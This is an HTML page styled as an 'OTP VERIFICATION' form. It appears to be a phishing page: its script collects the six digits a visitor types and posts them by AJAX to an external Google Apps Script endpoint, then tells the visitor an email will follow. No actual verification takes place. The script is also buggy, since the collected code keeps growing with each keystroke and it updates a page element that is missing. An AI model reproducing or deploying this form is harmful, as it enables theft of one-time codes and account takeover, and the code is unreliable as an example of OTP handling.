<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>otp verify</title>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>

</head>
<link rel="stylesheet" href="style.css">
<style>
    * {
  box-sizing: border-box;
}

body {
  margin: 0;
}

.title {
  max-width: 400px;
  margin: auto;
  text-align: center;
  font-family: "Poppins", sans-serif;
}
.title h3 {
  font-weight: bold;
}
.title p {
  font-size: 12px;
  color: #118a44;
}
.title p.msg {
  color: initial;
  text-align: initial;
  font-weight: bold;
}

.otp-input-fields {
  margin: auto;
  background-color: white;
  box-shadow: 0px 0px 8px 0px #02025044;
  max-width: 400px;
  width: auto;
  display: flex;
  justify-content: center;
  gap: 10px;
  padding: 40px;
}
.otp-input-fields input {
  height: 40px;
  width: 40px;
  background-color: transparent;
  border-radius: 4px;
  border: 1px solid #2f8f1f;
  text-align: center;
  outline: none;
  font-size: 16px;
  /* Firefox */
}
.otp-input-fields input::-webkit-outer-spin-button, .otp-input-fields input::-webkit-inner-spin-button {
  -webkit-appearance: none;
  margin: 0;
}
.otp-input-fields input[type=number] {
  -moz-appearance: textfield;
}
.otp-input-fields input:focus {
  border-width: 2px;
  border-color: #287a1a;
  font-size: 20px;
}

.result {
  max-width: 400px;
  margin: auto;
  padding: 24px;
  text-align: center;
}
.result p {
  font-size: 24px;
  font-family: "Antonio", sans-serif;
  opacity: 1;
  transition: color 0.5s ease;
}
.result p._ok {
  color: green;
}
.result p._notok {
  color: red;
  border-radius: 3px;
}
</style>
<body>
    

    <form id="submit-form" action="" class="otp-form" name="otp-form">
  
        <div class="title">
          <h3>OTP VERIFICATION</h3>
          <p class="info">An otp has been sent to your mobile number</p>
          <p class="msg">Please enter OTP to verify</p>
        </div>
        <div class="otp-input-fields">
          <input type="number" class="otp__digit otp__field__1">
          <input type="number" class="otp__digit otp__field__2">
          <input type="number" class="otp__digit otp__field__3">
          <input type="number" class="otp__digit otp__field__4">
          <input type="number" class="otp__digit otp__field__5">
          <input type="number" class="otp__digit otp__field__6">
        </div>
        <button class="login-button" title="login" >Verify
        </button>
      </form>

      <script>

let _finalKey = ""

var otp_inputs = document.querySelectorAll(".otp__digit")
var mykey = "0123456789".split("")
otp_inputs.forEach((_)=>{
  _.addEventListener("keyup", handle_next_input)
})
function handle_next_input(event){
  let current = event.target
  let index = parseInt(current.classList[1].split("__")[2])
  current.value = event.key
  
  if(event.keyCode == 8 && index > 1){
    current.previousElementSibling.focus()
  }
  if(index < 6 && mykey.indexOf(""+event.key+"") != -1){
    var next = current.nextElementSibling;
    next.focus()
  }


  for(let {value} of otp_inputs){
      _finalKey += value
  }
  if(_finalKey.length == 6){
    document.querySelector("#_otp").classList.replace("_notok", "_ok")
    document.querySelector("#_otp").innerText = _finalKey
  }else{
    document.querySelector("#_otp").classList.replace("_ok", "_notok")
    document.querySelector("#_otp").innerText = _finalKey
  }
}


$("#submit-form").submit((e)=>{
            e.preventDefault();
            if(_finalKey.length >= 6){
            $.ajax({
                url:'https://script.google.com/macros/s/AKfycbwqboKYBSf5hfZ2GtPBAb3q5YKxunu3Dm5ZOP0GBBKiQEgRsJGoIrux68ZRBl1WMVBq/exec',
                data: _finalKey,
                method:'post',
                success:function (response){
                    alert("We Will Send You An Email If The Verification Is Correct")
                },error:function (err){
                    alert("try again")
                }
            })
        }else{
            alert(_finalKey)
        }
        })

      </script>
</body>
</html>